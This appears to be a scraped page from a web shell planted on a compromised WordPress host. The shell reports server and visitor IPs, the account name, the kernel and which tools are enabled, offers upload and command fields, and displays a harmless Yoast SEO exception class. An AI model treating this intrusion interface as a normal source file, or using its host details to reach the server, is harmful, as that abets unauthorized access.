403Webshell
Server IP : 172.67.158.161  /  Your IP : 3.133.132.163
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/self/cwd/wp-content/plugins/wordpress-seo/inc/exceptions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/self/cwd/wp-content/plugins/wordpress-seo/inc/exceptions/class-invalid-indexable-exception.php
<?php
/**
 * WPSEO plugin file.
 *
 * @package WPSEO\Internals
 */

/**
 * Class WPSEO_Invalid_Indexable_Exception.
 */
class WPSEO_Invalid_Indexable_Exception extends InvalidArgumentException {

	/**
	 * Creates an invalid indexable exception.
	 *
	 * @param int $id The ID that was passed.
	 *
	 * @return WPSEO_Invalid_Indexable_Exception The exception.
	 */
	public static function non_existing_indexable( $id ) {
		return new self(
			sprintf(
				/* translators: %1$s expands to the indexable's ID. */
				__( 'Indexable with ID `%1$s` does not exist', 'wordpress-seo' ),
				$id
			)
		);
	}

	/**
	 * Creates an invalid POST request exception.
	 *
	 * @param int $id The ID that was passed.
	 *
	 * @return WPSEO_Invalid_Indexable_Exception The exception.
	 */
	public static function invalid_post_request( $id ) {
		return new self(
			sprintf(
				/* translators: %1$s expands to the indexable's ID. */
				__( 'Invalid POST request. Meta values already exist for object with ID %1$s.', 'wordpress-seo' ),
				$id
			)
		);
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit